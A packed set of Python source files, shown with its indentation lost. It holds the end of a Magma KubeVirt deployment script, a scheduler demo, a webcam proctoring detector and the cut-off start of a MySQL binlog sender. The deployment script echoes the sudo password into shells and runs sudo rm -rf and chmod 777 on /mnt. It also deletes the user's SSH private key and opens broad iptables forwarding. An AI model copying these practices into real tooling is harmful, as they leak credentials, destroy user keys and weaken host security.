myprint("BLUE", "*****Deleting 3 VMs magmatraffic, magmatest, magmadev*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_traffic.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_test.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_dev.yaml")
#Deleting DataVolumes which are created for upload the Debian Image
def del_dvs(pwd):
myprint("BLUE", "*****Deleting DataVolumes which are created for upload the Debian Image*****")
execute_cmd("kubectl delete dv magma-traffic -n kubevirt")
execute_cmd("kubectl delete dv magma-test -n kubevirt")
execute_cmd("kubectl delete dv magma-dev -n kubevirt")
time.sleep(10)
myprint("BLUE", "*****Deleting PersistantVolumes [PVs] which are created for upload the Debian Image*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_dev_pv.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_test_pv.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/magma_traffic_pv.yaml")
myprint("BLUE", "*****Deleting disk.img and tmpimage under /mnt path*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_dev/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_dev_scratch/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_test/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_test_scratch/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_traffic/' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm -rf /mnt/magma_traffic_scratch/' /dev/null" % pwd
execute_cmd(cmd)
#Deleting network-attachment-definitions
def del_network_attachment_definition():
myprint("BLUE", "*****Deleting Network-attachment-definitions*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/net_attach_def.yml")
#Removing ssh public key
def remove_ssh_key():
myprint("BLUE", "*****Removing the id_rsa ssh-key [ssh public key]*****")
execute_cmd("rm ~/.ssh/id_rsa.pub")
execute_cmd("rm ~/.ssh/id_rsa")
#Delete Brdiges created to communicate with VMs
def del_bridges(pwd):
myprint("BLUE", "*****Deleting Bridges created to communicate with VMs*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br0 down' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br1 down' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl delbr br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl delbr br1' /dev/null" % pwd
execute_cmd(cmd)
#Deleting virtctl
def del_virtctl(pwd):
myprint("BLUE", "*****Deleting virtctl*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo rm /usr/local/bin/virtctl' /dev/null" % pwd
execute_cmd(cmd)
#Deleting CDI
def del_cdi():
myprint("BLUE", "*****Deleting EFK [ElasticSearch Fluentd Kibana] configurations*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/kubevirt_efkchart.yaml -n kubevirt")
myprint("BLUE", "*****Deleting Containerized Data Import [CDI]*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/cdi-cr.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/cdi-operator.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/storage-setup.yml")
#Deleting kubevirt
def del_kubevirt():
myprint("BLUE", "*****Deleting kubevirt*****")
execute_cmd("kubectl delete -f $PWD/../helm/templates/kubevirt-cr.yaml")
execute_cmd("kubectl delete -f $PWD/../helm/templates/kubevirt-operator.yaml")
#Un-installing multus-cni plugin
def un_install_multus():
myprint("BLUE", "*****Un-installing multus-cni plugin*****")
os.chdir(MULTUS_DIR)
execute_cmd("cat ./images/multus-daemonset.yml | kubectl delete -f -")
os.chdir(TEMPLATES_DIR)
if os.path.exists(MULTUS_DIR):
shutil.rmtree(MULTUS_DIR)
os.chdir(CWD)
#Deleting Temperay files and directories created as part of VM installation
def del_temp_files():
myprint("BLUE", "*****Deleting Temperary files and directories created as part of VM installation*****")
del_files(INFRA_SOFTWARE_VER)
del_files(K8S_GET_OBJ)
if os.path.exists(ORC8R_VM_DIR):
shutil.rmtree(ORC8R_VM_DIR)
#Uninstalling VMs
def un_install_vm(pwd):
del_route(pwd)
del_iptables(pwd)
del_vms()
del_dvs(pwd)
del_network_attachment_definition()
remove_ssh_key()
del_bridges(pwd)
del_virtctl(pwd)
del_cdi()
del_kubevirt()
un_install_multus()
del_temp_files()
#Checking for pods and deployment status whether they are Running or not
def check_status(obj, namespace):
print("check_satus", obj, namespace)
if os.path.exists(ORC8R_VM_DIR):
shutil.rmtree(ORC8R_VM_DIR)
os.mkdir(ORC8R_VM_DIR)
if obj == "pod":
cmd = "kubectl get pods -n " + namespace + " | awk " + "'{{if ($3 ~ " + '!"Running"' + " || $3 ~ " + '!"STATUS"' + ") print $1,$3};}' > " + K8S_GET_OBJ
elif obj == "deployment":
cmd = "kubectl get deployment -n " + namespace + " | awk " + "'{{if ($2 ~ " + '!"1"' + " || $2 ~ " + '!"READY"' + ") print $1,$2};}' > " + K8S_GET_OBJ
execute_cmd(cmd)
if os.stat(K8S_GET_OBJ) == 0:
return
with open(K8S_GET_OBJ) as fop:
while True:
line = fop.readline()
if not line:
break
myprint("WARNING", obj + "is not yet Running, please wait for a while")
time.sleep(5)
check_status(obj, namespace)
# thread1 : Getting the status of k8s objects like deployment and updating the k8s_obj_dict dictionary
def get_status(lock):
while True:
if os.path.exists(K8S_GET_DEP):
if os.stat(K8S_GET_DEP).st_size == 0:
break
for values in k8s_obj_dict.values():
#Get the deployment which are not in Running state
cmd = "kubectl get deployment -n kubevirt | awk " + "'{{if ($2 ~ " + '!"1"' + " || $2 ~ " + '!"READY"' + ") print $1,$2};}' > " + K8S_GET_DEP
execute_cmd(cmd)
with open(K8S_GET_DEP) as fop1:
while True:
k8s_obj_file1_line = fop1.readline()
if not k8s_obj_file1_line:
break
k8s_obj_name_list1 = k8s_obj_file1_line.split(' ')
for key in k8s_obj_dict.keys():
#Checking whether any key matches with deployment which are not in Running state
if re.search(k8s_obj_name_list1[0], key):
myprint("WARNING", "Few k8s Objects not Running YET!! Be patient, Please wait for a while")
#Get the latest status of all the deployments
cmd = "kubectl get deployment -n kubevirt | awk " + "'{{if (NR != 1) print $1,$2};}' > " + K8S_GET_SVC
execute_cmd(cmd)
with open(K8S_GET_SVC) as fop2:
while True:
k8s_obj_file2_line = fop2.readline()
if not k8s_obj_file2_line:
break
k8s_obj_name_list2 = k8s_obj_file2_line.split(' ')
#Update the latest status of deployment into the k8s_obj_dict dictionary
if re.search(k8s_obj_name_list1[0], k8s_obj_name_list2[0]):
lock.acquire()
k8s_obj_dict[key][0] = k8s_obj_name_list2[1]
lock.release()
# thread2 : Getting the ports from running services and printing URL
def get_ports(lock):
#Get the hostip into host_ip local variable
host_ip = socket.gethostbyname(socket.gethostname())
for key, values in k8s_obj_dict.items():
if values[1] == 0:
if len(values) > 2:
port = values[2]
cmd = "http://" + host_ip + ":" + port
print("URL for :%s -->> %s"%(key,cmd))
webbrowser.open(cmd, new=2)
lock.acquire()
values[1] = 1
lock.release()
#Configure alert manager to get alerts from magmadev VM where AGW was Running
def configure_alert_manager():
myprint("BLUE", "*****Get the magmadev VM IP and update in service.yml, endpoint.yml to get the alerts from magmadev VM*****")
MAGMA_DEV_VM_IP = get_magmadev_vm_ip()
os.chdir(TEMPLATES_DIR)
for line in fileinput.input("endpoint.yml", inplace=True):
if "ip" in line:
print(line.replace("YOUR_MAGMA_DEV_VM_IP", MAGMA_DEV_VM_IP))
else:
print(line)
for line in fileinput.input("service.yml", inplace=True):
if "externalName:" in line:
print(line.replace("YOUR_MAGMA_DEV_VM_IP", MAGMA_DEV_VM_IP))
else:
print(line)
os.chdir(CWD)
myprint("BLUE", "*****Applying the yaml files required to get the alerts from magmadev VM*****")
execute_cmd("kubectl apply -f $PWD/../helm/templates/endpoint.yml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/service.yml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/service_monitor.yml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/alert_rules.yml")
#From the k8s services updating k8s_obj_dict dictionary and creating get_status, get_ports threads
def start_to_run():
cmd = "kubectl get services -n kubevirt | awk " + "'{{if ($5 ~ " + '"TCP"' + " || $5 ~ " + '"UDP"' + ") print $1, $5};}' > " + K8S_GET_SVC
execute_cmd(cmd)
#Initializing the k8s_obj_dict with default values list[0, 0] for each key:k8s_obj_name
with open(K8S_GET_SVC) as fop:
while True:
k8s_obj_file_line = fop.readline()
if not k8s_obj_file_line:
break
k8s_obj_name_list = k8s_obj_file_line.split(' ')
k8s_obj_dict[k8s_obj_name_list[0]] = [0, 0]
#Updating the k8s_obj_dict with ports as values for each key:k8s_obj_name
ports_list = k8s_obj_name_list[1].split('/')
if len(ports_list[0].split(':')) > 1:
for key in k8s_obj_dict.keys():
if re.search(k8s_obj_name_list[0], key):
k8s_obj_dict.setdefault(key, []).append(ports_list[0].split(':')[1])
t1 = threading.Thread(target=get_status, args=(lock,))
t2 = threading.Thread(target=get_ports, args=(lock,))
t1.start()
t2.start()
t1.join()
t2.join()
#Applying all the yaml files to create all k8s objects
def run_services():
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Installing Orc8r monitoring stack")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
execute_cmd("helm repo add prometheus-community https://prometheus-community.github.io/helm-charts")
execute_cmd("helm repo add stable https://charts.helm.sh/stable")
execute_cmd("helm repo update")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_alertmanagers.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_podmonitors.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_prometheuses.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_prometheusrules.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_servicemonitors.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/monitoring.coreos.com_thanosrulers.yaml -n kubevirt")
execute_cmd("kubectl apply -f $PWD/../helm/templates/kubevirt_efkchart.yaml -n kubevirt")
time.sleep(3)
execute_cmd("helm install prometheus stable/prometheus-operator --namespace kubevirt")
myprint("FAIL", "change type(key) value from 'ClusterIP' to 'NodePort' and save it")
time.sleep(3)
execute_cmd("kubectl edit service/prometheus-prometheus-oper-alertmanager -n kubevirt")
myprint("FAIL", "change type(key) value from 'ClusterIP' to 'NodePort' and save it")
time.sleep(3)
execute_cmd("kubectl edit service/prometheus-grafana -n kubevirt")
myprint("FAIL", "change type(key) value from 'ClusterIP' to 'NodePort' and save it")
time.sleep(3)
execute_cmd("kubectl edit service/prometheus-prometheus-oper-prometheus -n kubevirt")
configure_alert_manager()
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("BLUE", " Orc8r monitoring stack installed successfully")
myprint("GREEN", "+++++++++++++++++++++++++++++++++++++++++++++++")
myprint("HDR", "-------------------------------------------------")
myprint("WARNING", " Printing URL's for Dashboards")
myprint("HDR", "-------------------------------------------------")
start_to_run()
#Install multus plugin which will be used for creating multiple interfaces in VM in addition to the default interfaces
def install_multus_plugin():
myprint("BLUE", "*****Installing multus plugin which is used for creating multiple interfaces in VM in addition to the default interfaces*****")
os.chdir(TEMPLATES_DIR)
execute_cmd("git clone https://github.com/intel/multus-cni.git")
os.chdir(MULTUS_DIR)
execute_cmd("cat ./images/multus-daemonset.yml | kubectl apply -f -")
os.chdir(CWD)
#Install kubevirt which allows to run virtual machines alongside your containers on a k8s platform
def install_kubevirt():
myprint("BLUE", '*****Installing KubeVirt which allows to run virtual machines along with containers in k8s platform*****')
execute_cmd("kubectl apply -f $PWD/../helm/templates/kubevirt-operator.yaml")
check_status("pod", "kubevirt")
execute_cmd("kubectl create configmap kubevirt-config -n kubevirt --from-literal debug-useEmulation=true")
execute_cmd("kubectl apply -f $PWD/../helm/templates/kubevirt-cr.yaml")
check_status("pod", "kubevirt")
myprint("BLUE", "*****Wait until all KubeVirt components is up*****")
execute_cmd("kubectl -n kubevirt wait kv kubevirt --for condition=Available")
#Install Containerized Data Importer [CDI] used to import VM images to crate and control PVC
def install_cdi():
myprint("BLUE", "*****Installing COntainerized Data Importer[CDI] used to import VM images to create PVC*****")
execute_cmd("kubectl create -f $PWD/../helm/templates/storage-setup.yml")
execute_cmd("kubectl create -f $PWD/../helm/templates/cdi-operator.yaml")
execute_cmd("kubectl create -f $PWD/../helm/templates/cdi-cr.yaml")
check_status("pod", "cdi")
#Install virtctl which is used to create DV,PVC to upload disk.img also used to connect and control VM via CLI
def install_virtctl(pwd):
myprint("BLUE", '*****Installing virtctl which is used to create DV,PVC to upload disk.img*****')
os.chdir(TEMPLATES_DIR)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo install virtctl /usr/local/bin' /dev/null" % pwd
execute_cmd(cmd)
os.chdir(CWD)
#Create Bridges which are required to communicate between Host to VM and VM to VM
def create_bridges(pwd):
myprint("BLUE", "*****Creating Bridges required to communicate between Host to VM and VM to VM*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl addbr br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo brctl addbr br1' /dev/null" % pwd
execute_cmd(cmd)
#Creating NetworkAttachmentDefinition to configure Network Attachment with a L2 Bridge and Vlan
def create_network_attachment_definition():
myprint("BLUE", "*****Creating NetworkAttachmentDefinition to configure Network Attachment with a L2 Bridge*****")
execute_cmd("kubectl create -f $PWD/../helm/templates/net_attach_def.yml")
#Generate ssh-key and inject to debian qcow2 image to make use of passwordless authentication via root user
def generate_ssh_public_key(pwd):
os.chdir(TEMPLATES_DIR)
if not os.path.exists(DEBIAN_QCOW2_FILE):
myprint("WARNING", "*****debian-9-openstack-amd64.qcow2 image is not present under magma/cn/deploy/helm/templates/ directory script will download it, Please be patient!! it may take some time based on your bandwidth!!*****")
execute_cmd("wget http://cdimage.debian.org/cdimage/openstack/current-9/debian-9-openstack-amd64.qcow2")
else:
myprint("BLUE", "*****debian-9-openstack-amd64.qcow2 image is already present under magma/cn/deploy/helm/templates/ directory so skipping download!!*****")
myprint("BLUE", "*****Generating password-less SSH key and inject to debian qcow2 image*****")
execute_cmd('ssh-keygen -f ~/.ssh/id_rsa -q -N "" 0>&-')
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo virt-sysprep -a debian-9-openstack-amd64.qcow2 --ssh-inject root:file:$HOME/.ssh/id_rsa.pub' /dev/null" % pwd
execute_cmd(cmd)
os.chdir(CWD)
execute_cmd("kubectl -n kubevirt wait kv kubevirt --for condition=Available")
time.sleep(10)
#Creating DataVolumes for magmadev, magmatest, magmatraffic VMs, These DataVolumes will mount corresponding PVC
def create_datavolume(pwd):
myprint("BLUE", "*****Creating DataVolumes to mount debian qcow2 image *****")
#Get the cdi_uplodproxy service IP address which is used to frame URL to image-upload
cmd = "kubectl get svc -n cdi | grep 'cdi-uploadproxy' | awk '{print $3}'"
data = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
stdout, stderr = data.communicate()
cdi_uplaod_proxy_ip_add = stdout.strip().decode('utf-8')
#Create directories under /mnt to store disk.img from the mounted PVC
myprint("BLUE", "*****Create directories under /mnt to store disk.img under /mnt from the mounted PVC *****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_dev' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_dev_scratch' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_test' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_test_scratch' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_traffic' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo mkdir -p /mnt/magma_traffic_scratch' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo chmod 777 /mnt/*' /dev/null" % pwd
execute_cmd(cmd)
#Create PVs which are going to claim by PVCs
myprint("BLUE", "*****Create PVs which are going to Claim by PVCs*****")
execute_cmd("kubectl apply -f $PWD/../helm/templates/magma_dev_pv.yaml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/magma_test_pv.yaml")
execute_cmd("kubectl apply -f $PWD/../helm/templates/magma_traffic_pv.yaml")
#Create DataVolume[dv] which will mount the debian qcow2 disk.img to corresponding mounted path under /mnt
myprint("BLUE", "*****Create DataVolume[dv] which will mount the debian qcow2 disk.img to directory under /mnt*****")
try:
cmd = "virtctl image-upload dv magma-dev --namespace kubevirt --pvc-size=50Gi --image-path $PWD/../helm/templates/debian-9-openstack-amd64.qcow2 --uploadproxy-url=https://%s:443 --insecure" % cdi_uplaod_proxy_ip_add
execute_cmd(cmd)
cmd = "virtctl image-upload dv magma-test --namespace kubevirt --pvc-size=50Gi --image-path $PWD/../helm/templates/debian-9-openstack-amd64.qcow2 --uploadproxy-url=https://%s:443 --insecure" % cdi_uplaod_proxy_ip_add
execute_cmd(cmd)
cmd = "virtctl image-upload dv magma-traffic --namespace kubevirt --pvc-size=50Gi --image-path $PWD/../helm/templates/debian-9-openstack-amd64.qcow2 --uploadproxy-url=https://%s:443 --insecure" % cdi_uplaod_proxy_ip_add
execute_cmd(cmd)
except NotInstalled:
print("Image upload not completed")
myprint("FAIL", "Image upload not completed")
#Creating 3 VMs magmadev, magmatest, magmatraffic
def create_vm():
myprint("BLUE", "*****Creating 3 VMs magmadev, magmatest, magmatraffic*****")
execute_cmd("kubectl create -f $PWD/../helm/templates/magma_dev.yaml")
execute_cmd("kubectl create -f $PWD/../helm/templates/magma_test.yaml")
execute_cmd("kubectl create -f $PWD/../helm/templates/magma_traffic.yaml")
myprint("BLUE", "*****Wait for some time to VM to wake up to Running state*****")
time.sleep(10)
#Adding route information of Bridge
def add_route_info(pwd):
myprint("BLUE", "*****Add route information of bridge*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br0 up' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo ifconfig br1 up' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route add -net 192.168.60.0 netmask 255.255.255.0 dev br0' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo route add -net 192.168.129.0 netmask 255.255.255.0 dev br1' /dev/null" % pwd
execute_cmd(cmd)
#Updating iptables to forward VM traffic
def add_iptables_rule(pwd):
myprint("BLUE", "*****Update iptables to forward VM traffic*****")
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -A FORWARD -s 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
cmd = "{ sleep 0.1; echo '%s'; } | script -q -c 'sudo iptables -A FORWARD -d 192.168.0.0/16 -j ACCEPT' /dev/null" % pwd
execute_cmd(cmd)
#Create magmadev, magmatest, magmatraffic [3 VMs] by step by step
def install_vm(pwd):
install_multus_plugin()
install_kubevirt()
install_cdi()
install_virtctl(pwd)
create_bridges(pwd)
create_network_attachment_definition()
generate_ssh_public_key(pwd)
create_datavolume(pwd)
create_vm()
add_route_info(pwd)
add_iptables_rule(pwd)
#Displays the Usage of the script
def get_help(color):
myprint(color, './MVC2_5G_Orc8r_deployment_script.py -p <sudo-password> -i')
myprint(color, './MVC2_5G_Orc8r_deployment_script.py -p <sudo-password> -u')
myprint(color, ' (OR) ')
myprint(color, './MVC2_5G_Orc8r_deployment_script.py --password <sudo-password> --install')
myprint(color, './MVC2_5G_Orc8r_deployment_script.py --password <sudo-password> --uninstall')
def main(argv):
password = ''
try:
opts, args = getopt.getopt(argv, "hiup:", ["help", "install", "uninstall", "password="])
except getopt.GetoptError:
get_help("FAIL")
for opt, arg in opts:
if (re.match("-h", opt) or re.match("--help", opt)):
get_help("BLUE")
elif (opt == "-p" or opt == "--password"):
password = arg
elif (opt == "-i" or opt == "--install"):
myprint("HDR", "-------------------------------------------------")
myprint("GREEN", " Checking Pre-requisites: ")
myprint("HDR", "-------------------------------------------------")
check_pre_requisite()
install_vm(password)
run_services()
myprint("HDR", "-------------------------------------------------")
myprint("WARNING", " URL's for Dashboards printed successfully")
myprint("HDR", "-------------------------------------------------")
elif (opt == "-u" or opt == "--uninstall"):
un_install_vm(password)
un_install(password)
if __name__ == "__main__":
main(sys.argv[1:])
|
scheduler.py
|
#!/usr/bin/env python
from multiprocessing import Process, Queue
from uuid import uuid4
import time, sys
from random import random
class Scheduler:
def __init__(self, maxsize):
q_in = Queue()
work_q = Queue(maxsize = maxsize)
def worker():
while True:
sys.stderr.write(">>> qsize=%d waiting=%d\n"%(work_q.qsize(), q_in.qsize()))
job = q_in.get()
if job == False:
sys.stderr.write("Terminating\n")
return
sys.stderr.write("Got job %s\n"%job.ident)
work_q.put(job)
sys.stderr.write("Executing job %s\n"%job.ident)
def task():
t1 = time.time()
job.scan()
if job.posthook:
sys.stderr.write('Executing post hook for job %s\n'%job.ident)
job.posthook()
try:
x = work_q.get(timeout=job.timeout)
sys.stderr.write('delta %.2f x: %s\n'%(time.time()-t1,str(x)))
except:
raise
sys.stderr.write("Done with job %s\n"%job.ident)
p = Process(target = task)
p.start()
sys.stderr.write("<<< qsize=%d waiting=%d\n"%(work_q.qsize(), q_in.qsize()))
self.q_in = q_in
self.work_q = work_q
p = Process(target = worker)
p.start()
def qsize(self):
return self.q_in.qsize() + self.work_q.qsize()
def status(self):
return "%d / %d"%(self.work_q.qsize(), self.q_in.qsize())
def add_job(self, job):
self.q_in.put(job, False)
def stop(self):
self.q_in.put(False, False)
class idgen:
def __init__(self):
self.i=0
def getid(self):
self.i += 1
return "id-%s"%self.i
i = idgen()
class FakeScan:
def __init__(self):
self.duration = 1.0 + 5.0 * random()
self.ident = i.getid()
self.posthook = None
self.timeout = 2
def scan(self):
sys.stdout.write("Scanning... %s\n" % self.ident)
time.sleep(self.duration)
sys.stdout.write("Scanned %s\n" % self.ident)
if __name__=='__main__':
scans = []
for x in range(5):
scans.append(FakeScan())
s = Scheduler(2)
for x in scans:
s.add_job(x)
sys.stderr.write("Added job %s to scheduler\n"%x.ident)
sys.stderr.write("Done adding jobs to scheduler\n")
s.stop()
|
main.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 6 03:38:43 2020
@author: hp
"""
import webbrowser
import time
import os
import threading
import cv2
import dlib
import numpy as np
from yolo_helper import YoloV3, load_darknet_weights, draw_outputs
from dlib_helper import (shape_to_np,
eye_on_mask,
contouring,
process_thresh,
print_eye_pos,
nothing)
from define_mouth_distances import return_distances
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
yolo = YoloV3()
load_darknet_weights(yolo, 'yolov3.weights')
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor('shape_68.dat')
d_outer, d_inner = return_distances(detector, predictor)
cap = cv2.VideoCapture(0)
_, frame_size = cap.read()
def eyes_mouth():
ret, img = cap.read()
thresh = img.copy()
w, h = img.shape[:2]
outer_points = [[49, 59], [50, 58], [51, 57], [52, 56], [53, 55]]
inner_points = [[61, 67], [62, 66], [63, 65]]
left = [36, 37, 38, 39, 40, 41]
right = [42, 43, 44, 45, 46, 47]
kernel = np.ones((9, 9), np.uint8)
cv2.namedWindow('image')
cv2.createTrackbar('threshold', 'image', 0, 255, nothing)
while True:
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
rects = detector(gray, 1)
for rect in rects:
shape = predictor(gray, rect)
shape = shape_to_np(shape)
#mouth
cnt_outer = 0
cnt_inner = 0
for i, (p1, p2) in enumerate(outer_points):
if d_outer[i] + 5 < shape[p2][1] - shape[p1][1]:
cnt_outer += 1
for i, (p1, p2) in enumerate(inner_points):
if d_inner[i] + 3 < shape[p2][1] - shape[p1][1]:
cnt_inner += 1
if cnt_outer > 4 or cnt_inner > 3:
print('Mouth open')
for (x, y) in shape[48:]:
cv2.circle(img, (x, y), 2, (0, 0, 255), -1)
#eyes
mask = np.zeros((w, h), dtype=np.uint8)
mask, end_points_left = eye_on_mask(mask, left, shape)
mask, end_points_right = eye_on_mask(mask, right, shape)
mask = cv2.dilate(mask, kernel, 5)
eyes = cv2.bitwise_and(img, img, mask=mask)
mask = (eyes == [0, 0, 0]).all(axis=2)
eyes[mask] = [255, 255, 255]
mid = (shape[42][0] + shape[39][0]) // 2
eyes_gray = cv2.cvtColor(eyes, cv2.COLOR_BGR2GRAY)
threshold = cv2.getTrackbarPos('threshold', 'image')
_, thresh = cv2.threshold(eyes_gray, threshold, 255, cv2.THRESH_BINARY)
thresh = process_thresh(thresh)
eyeball_pos_left = contouring(thresh[:, 0:mid], mid, img, end_points_left)
eyeball_pos_right = contouring(thresh[:, mid:], mid, img, end_points_right, True)
print_eye_pos(eyeball_pos_left, eyeball_pos_right)
cv2.imshow('result', img)
cv2.imshow("image", thresh)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
def count_people_and_phones():
while True:
ret, image = cap.read()
frame = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (320, 320))
frame = frame.astype(np.float32)
frame = np.expand_dims(frame, 0)
frame = frame / 255
class_names = [c.strip() for c in open("classes.txt").readlines()]
boxes, scores, classes, nums = yolo(frame)
count = 0
for i in range(nums[0]):
if int(classes[0][i] == 0):
count += 1
if int(classes[0][i] == 67):
print("Mobile Phone Detected")
if count == 0:
print('No person detected')
elif count > 1:
print('More than one person detected')
image = draw_outputs(image, (boxes, scores, classes, nums), class_names)
cv2.imshow('Prediction', image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
t1 = threading.Thread(target=eyes_mouth)
t2 = threading.Thread(target=count_people_and_phones)
t1.start()
t2.start()
t1.join()
t2.join()
cap.release()
cv2.destroyAllWindows()
html_content = f"<html> <head> </head> <h1> {t1} </h1> <body> </body> </html>"
with open("index.html", "w") as html_files:
html_files.write(html_content)
print("Html file")
time.sleep(2)
webbrowser.open_new_tab("index.html")
|
senderManager.py
|
# Copyright (c) 2020-present ly.com, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!usr/bin/env python
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import os
import re
import random
import pymysql
import commands
import io
import time
import json
import signal
import ConfigParser
import threading
import Queue
#from DBUtils.PooledDB import PooledDB
from datetime import datetime
import socket
import multiprocessing
from mysqlSender import MysqlSender
from localSender import LocalSender
from kafkaSender import KafkaSender
from sqlConstruct import SqlConstruct
class SenderManager(multiprocessing.Process):
def __init__(self,configPath, queue, ackQueue):
multiprocessing.Process.__init__(self)
self.datasource = queue
self.ackQueue = ackQueue
self.configPath = configPath
self.daemon = True
def init(self):
self.commitTs = 0
print os.getppid()
self.config = ConfigParser.ConfigParser()
self.config.read(self.configPath)
self.updateCheckpointThread = threading.Thread(target=self.updateCheckpointThreadFunc)
self.updateCheckpointThread.setDaemon(True)
self.updateCheckpointThread.start()
self.type_list = self.config.get('global','type').split(',')
self.check_list = []
self.sqlConstruct = SqlConstruct()
self.initSenders()
def isAlive(self):
return self.is_alive()
def initSenders(self):
self.senderList = []
for ty in self.type_list:
if ty == 'mysql':
self.senderList.append(MysqlSender(self.config))
elif ty == 'local':
self.senderList.append(LocalSender(self.config))
elif ty == 'kafka':
self.senderList.append(KafkaSender(self.config))
for sender in self.senderList:
sender.start()
def run(self):
self.init()
beg = time.time()
cnt = 0
while 1:
binlog_list = []
for i in range(1000):
# 1.binlog队列为空 2.检测到冲突 3.获取到1000条binlog
# 跳出循环,发送不为空的binlog_list
#if self.datasource.empty():
# break
binlog = self.datasource.get()
cnt += 1
if cnt % 10000 == 0:
print cnt, "%.2f" % (time.time() - beg)
beg = time.time()
# 检测冲突
hash_flag = ""
hash_flag_old = ""
hash_flag = '_'.join(['%s' % str(binlog['value'][key]) for key in binlog['primary_key']])
if binlog['type'] == 'UPDATE':
hash_flag_old = '_'.join(['%s' % str(binlog['old_value'][key]) for key in binlog['primary_key']])
if self.check_list.count(hash_flag):
self.flushjob()
self.check_list.append(hash_flag)
if binlog['type'] == "UPDATE":
